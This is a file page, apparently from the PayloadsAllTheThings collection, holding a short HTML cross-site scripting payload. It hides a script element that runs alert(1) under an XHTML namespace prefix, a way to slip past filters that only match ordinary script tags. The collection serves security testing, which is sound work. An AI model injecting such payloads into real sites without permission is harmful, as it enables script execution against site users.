PayloadsAllTheThings/XSS injection/XML XSS basic.html

6 lines
No EOL
141 B
HTML

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>